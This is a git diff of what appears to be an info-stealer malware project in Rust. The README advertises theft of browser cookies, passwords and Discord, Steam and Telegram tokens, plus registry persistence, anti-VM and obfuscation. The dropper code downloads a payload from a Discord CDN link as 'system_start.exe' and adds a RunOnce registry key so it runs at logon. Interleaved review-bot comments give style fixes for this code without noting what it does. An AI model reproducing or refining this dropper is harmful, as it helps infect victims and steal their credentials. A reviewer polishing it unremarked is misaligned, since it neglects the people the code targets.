diff --git a/README.md b/README.md
index 0a49126eb69c2067d060a698105d822d027fa86d..4e094ba2139f6ae8398696ae540ec8244d82440c 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,13 @@ Additional:
 - browser cookies
 - browser passwords
 - telegram, steam, discord tokens
-- persistence via regkey
+- persistence via regkey ✅
 - anti-VM, anti-debug
 - packing
 - obfuscation
+
+## Inspirations
+
+https://github.com/Abdulrhmanbk/discoon-malware/
+
+https://github.com/doenerium69/doenerium
diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index 8e92751679621ade365fcf9059380bac9015ef3a..0f246f9d1db73ea25bcc5029fa980a0a272904eb 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -8,3 +8,5 @@ edition = "2021"
 [dependencies]
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
+directories = "5.0.1"
+winreg = "0.50.0"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 63a25605ed6b4afcbdfebb343d967ee746f1fd9e..90756cc0467b74cf476be362658d4a42dee02321 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,7 +1,12 @@
 use std::{io::Cursor, env::var_os};
+use directories::UserDirs;
+use std::path::Path;
+use winreg::enums::*;
+use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
-async fn fetch_url(url: String, file_name: String) -> Result<()> {
+async fn download_payload(file_name: String) -> Result<()> {
+ let url = "https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string();
 let response = reqwest::get(url).await?;
 let mut file = std::fs::File::create(file_name)?;
 let mut content = Cursor::new(response.bytes().await?);
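Review bot: In `download_payload`, `url` is allocated with `.to_string()` only to be moved straight into `reqwest::get`, which accepts any `IntoUrl` including `&str`, so the literal can be bound without the allocation: `let url = "<payload-url placeholder>";`. Removing the former `url` parameter also changes the function's interface to a single fixed source, which a one-line doc comment on the new signature should state. The body of `download_payload` continues past the end of this hunk.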
@@ -11,9 +16,29 @@ async fn fetch_url(url: String, file_name: String) -> Result<()> {
 #[tokio::main]
 async fn main() {
- let test = var_os("APPDATA").unwrap();
- let appdata = test.to_str().unwrap();
- let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
- let startup = format!("{}{}", appdata, right_path);
- fetch_url("URL HERE".to_string(), startup.to_string()).await.unwrap();
+
+ if true {
+ let user_dirs = UserDirs::new().unwrap() ;
+ let homedir = user_dirs.home_dir().to_str().unwrap();
+ let path = format!("{}{}", homedir, "\\system_start.exe");
+
+ download_payload(path.to_string()).await.unwrap();
+
+ let hkcu = RegKey::predef(HKEY_CURRENT_USER);
+ let reg_path = Path::new("Software") .join("Microsoft") .join("Windows") .join("CurrentVersion") .join("RunOnce");
+ let (key, _) = hkcu.create_subkey(®_path).unwrap();
+ key.set_value("System start", &path).unwrap();
+ }else{
+ let test = var_os("APPDATA").unwrap();
+ let appdata = test.to_str().unwrap();
+ let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
+ let path = format!("{}{}", appdata, right_path);
+
+ download_payload(path.to_string()).await.unwrap();
+
+ }
 }
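Review bot: The `if true { … } else { … }` in `main` leaves the entire `else` branch (the `APPDATA` Startup-folder variant) unreachable; dead code should be deleted rather than parked behind a constant condition, which also removes the duplicated `download_payload(path.to_string()).await.unwrap();` call. The new lines are not `rustfmt`-clean — `UserDirs::new().unwrap() ;` has a stray space before the semicolon and `}else{` lacks spacing — so a `cargo fmt` pass is warranted. `®_path` as printed is presumably `&reg_path` mangled by entity rendering of this page rather than a change in the source.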